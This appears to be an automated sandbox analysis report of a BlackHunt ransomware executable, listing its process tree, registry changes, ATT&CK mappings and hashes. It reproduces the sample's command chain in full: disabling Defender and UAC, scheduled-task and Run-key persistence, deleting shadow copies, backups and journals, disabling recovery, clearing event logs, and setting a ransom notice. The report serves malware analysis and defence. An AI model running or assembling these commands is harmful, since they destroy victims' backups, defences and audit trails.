f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1428
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe" /F2⤵PID:1632
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe" /F3⤵
- Creates scheduled task(s)
PID:3252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1312
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2256
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1928
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2984
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2100
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:324
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:548
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1104
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:652
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1748
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2236
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1540
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3612
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1740
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:340
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3580
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2488
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3488
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:852
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:720
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2200
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:228
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1508
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1536
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2900
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3552
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2152
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1940
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3228
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"2⤵
- Deletes itself
PID:1196 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2884
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1093156197-1685217533-1193250938117168178112965689896445812181629829438-112077009"1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1880
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-866886269-286733026157981736228694697147046876275394198518405446331317744326"1⤵PID:1844
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2996
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2472
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD551d9a948c2b284973de7d10c6823fa45
SHA1ac7593515157ca3b97f6f9d55f7edda93acb279a
SHA256da411b6500e60008e8dffa825dbb7c38c1d4ee37ae60b97f60fbc449f0aa6403
SHA5126061a3de65086cfdb995e8446bd9f7057833f92582f1c8a57fbd3d9bff0906e1779380e69afeeb443a5ff49889aa3733be637ea1eb34dba239eb62a75d27892e
-
Filesize
12KB
MD524545cbe0b7d36fd23492cacc61de7e4
SHA189f829a4cbcf7da51d4fb72b8e5ec6c605374c5e
SHA256078b8d0169718df70a3df359e243e63e40cf78fb4ad15b40e3c9d45f4889f560
SHA512f7c12d613909011dde9b6ccc32d9adfcec0b3367c284904489b576ebb9aed7872a20fcef10e76d3be66896c495d13227ab921ede7c1ce2aeca52da9a1e33e701
-
Filesize
684B
MD5dad894a841ac3f94ea1d46ed90ea8ff9
SHA1293d65112eed81c8af5c4aa7f09f8894ba6be3fb
SHA2569d153b934bfdc720d5ad933868de35388d5893fc127ea4f918fef6b69a44219d
SHA5126bcc817fedd3e44c781dae066084f08844011a34d8193315c582bcf568b76bdb465d9665cef176bd33df3a59277416eaeb9eb72b106ee4cd1b89d496e8d6348d